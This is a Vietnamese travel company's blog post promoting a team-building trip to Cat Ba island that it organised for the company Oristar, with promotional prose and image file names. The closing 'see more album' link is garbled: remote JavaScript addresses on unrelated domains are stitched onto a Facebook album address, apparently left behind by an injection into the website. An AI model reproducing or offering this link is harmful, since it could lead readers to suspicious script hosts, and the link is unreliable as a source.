Tổ chức du lịch Team building: Công ty ORISTAR

Ngày 30/6 – 2/7 vừa qua Vietwind đã vinh dự là đơn vị tổ chức chuyến du lịch team building Công ty Oristar. Các thành viên của đại gia đìnnh Orista đã được trải nghiệm hành trình đầy kì thú khi đến với Cát Bà – hòn đảo xinh đẹp nằm trong chuỗi các hoạt động hè du lịch team building của Vietwind. 

to-chuc-team-building-oristar-vietwind-team-building-2 to-chuc-team-building-oristar-vietwind-team-building-3

Trong một không gian rộng lớn, ngoài bãi biển lộng gió các chiến binh Orista đã tham gia vào chuỗi các hoạt động team building do chúng ta. Từng thử thách khó dần theo các cấp độ khác nhau được đưa ra những cũng không làm khó được họ. Trong suốt chương trình, chúng tôi có thể thấy được nụ cười rạng rỡ trên môi của từng thành viên. Dường như những thử thách chỉ khiến họ thêm quyết tâm và đoàn kết hơn.

to-chuc-team-building-oristar-vietwind-team-building-6 to-chuc-team-building-oristar-vietwind-team-building-5

Thông qua các trò chơi, mỗi thành viên lại có cơ hội để thể hiện sự khéo léo và khả năng sáng tạo của bản thân. Tuy nhiên để giành chiến thắng thì các đội phải hoàn thành thử thách một cách nhanh nhất. Điều này đòi hỏi sự phối hợp nhịp nhàng của từng thành viên, họ phải biết phân chia công việc phù hợp và phân bổ thời gian hợp lý.

to-chuc-team-building-oristar-vietwind-team-building-4 to-chuc-team-building-oristar-vietwind-team-building-1

Chương trình Team Building đặc sắc và lôi cuốn các chiến binh của Oristar tham gia hết mình và bùng cháy. Các thành viên tham gia chương trình đã có những trải nghiệm vô cùng bổ ích

Vietwind – Bứt phá vươn cao!

 * Xem thêm album: 

>>> https://css.digestcolect.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&www.facebook.com/vietwindtravel.com.vn/photos/?tab=album&album_id=982185071889573

Facebook Comments

Bài Viết Liên Quan